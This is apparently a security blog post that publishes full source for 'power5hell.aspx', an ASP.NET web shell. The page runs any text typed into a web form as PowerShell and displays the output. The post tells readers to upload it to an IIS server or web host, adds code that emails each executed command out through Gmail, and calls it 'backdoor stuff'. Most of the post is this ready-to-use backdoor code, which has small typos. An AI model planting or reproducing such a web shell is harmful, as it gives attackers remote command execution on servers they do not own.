PHP and Website Security ProjectX

power5hell.aspx – Power shell for asp.net Pentesting Tool

power5hell.apsx

According to Microsoft

“Microsoft Windows PowerShell command line shell and scripting language helps IT professionals achieve greater control and productivity. Using a new admin-focused scripting language, more than 130 standard command line tools, and consistent syntax and utilities, Windows PowerShell allows IT professionals to more easily control system administration and accelerate automation. Windows PowerShell is easy to adopt, learn, and use, because it works with your existing IT infrastructure and existing script investments, and because it runs on Windows XP, Windows Vista, and Windows Server 2003. Windows PowerShell is now included as part of Windows Server 2008 and can be evaluated in Windows Server 2008 Beta 3. Exchange Server 2007, System Center Operations Manager 2007, System Center Data Protection Manager V2, and System Center Virtual Machine Manager also leverage Windows PowerShell to improve administrator control, efficiency, and productivity.”

Source Code

<%@ Page Language=”C#” %>
<%@ Import Namespace=”System.Collections.ObjectModel”%>
<%@ Import Namespace=”System.Management.Automation”%>
<%@ Import Namespace=”System.Management.Automation.Runspaces”%>
<%@ Assembly Name=”System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31BF3856AD364E35″%>

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>

<script runat=”server”>

private static string Power5hell(string scriptText)
{
try
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();

Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(scriptText);
pipeline.Commands.Add(“Out-String”);

Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
stringBuilder.AppendLine(obj.ToString());

return stringBuilder.ToString();
}catch(Exception exception)
{
return string.Format(“Error: {0}”, exception.Message);
}
}

protected void Page_Load(object sender, EventArgs e)
{
if (Page.IsPostBack)
{
if(inputTextBox.Text.Length > 0)
{
outputTextBox.Text = Power5hell(inputTextBox.Text.Trim());
inputTextBox.Text = string.Empty;
}
}
}
</script>

<html xmlns=”http://www.w3.org/1999/xhtml”>
<head runat=”server”>
<title>impeldown power5hell</title>
<style type=”text/css”>
.style1
{
color: #0033CC;
font-weight: bold;
}
.style2
{
color: #FFFFFF;
font-weight: bold;
}
</style>
</head>
<body bgcolor=”#000000″>
<form id=”form1″ runat=”server”>
<div style=”color: #FF0000″>

<span>::impeldown</span>
<span>power5hell</span><span>::<br />
Greetz to: TheProjectX</span><span><br />
</span><br />

</div>
<asp:TextBox ID=”outputTextBox” runat=”server” BackColor=”Black”
ForeColor=”#33CC33″ Height=”426px” ReadOnly=”True” TextMode=”MultiLine”
Width=”715px” ToolTip=”Power5hell output”></asp:TextBox>
<br />
<asp:TextBox ID=”inputTextBox” runat=”server” Width=”715px”
ToolTip=”Enter power5hell command here”></asp:TextBox>
</form>
</body>
</html>

Upload this to your IIS Server or webhost then try the power5hell with your favorite web browser.

You can also add email logger in your asp.net shell, try this sample function.

public bool SendMail(string mailAccount, string password, string to, string subject, string message, string smtp)
{
try
{
NetworkCredential loginInfo = new NetworkCredential(mailAccount, password);
MailMessage msg = new MailMessage();
msg.From = new MailAddress(mailAccount);
msg.To.Add(new MailAddress(to));
msg.Subject = subject;
msg.Body = message;
msg.IsBodyHtml = true;
SmtpClient client = new SmtpClient(smtp); //example: “smtp.gmail.com”
client.EnableSsl = true;
client.UseDefaultCredentials = false;
client.Credentials = loginInfo;
client.Send(msg);

return true;
}
catch (Exception)
{
return false;
}
}

Example in gmail:

protected void Page_Load(object sender, EventArgs e)
{
if (Page.IsPostBack)
{
if(inputTextBox.Text.Length > 0)
{
string cmd = inputTextBox.Text.Trim()
outputTextBox.Text = Power5hell(cmd);
inputTextBox.Text = string.Empty;
sting msg = string.format(“Executing {0}”, cmd);
if(SendMail(“youraccount@gmail.com”, “myp4ss”, “tologaccount@gmail.com”, “power5hell”, msg, “smtp.gmail.com”))
{
//Additional code goes here if successfully mailed
}else
{
//Otherwise…
}
}
}
}

 

This is also considered as a backdoor stuff so use this at your own risk!!!

Leave a Reply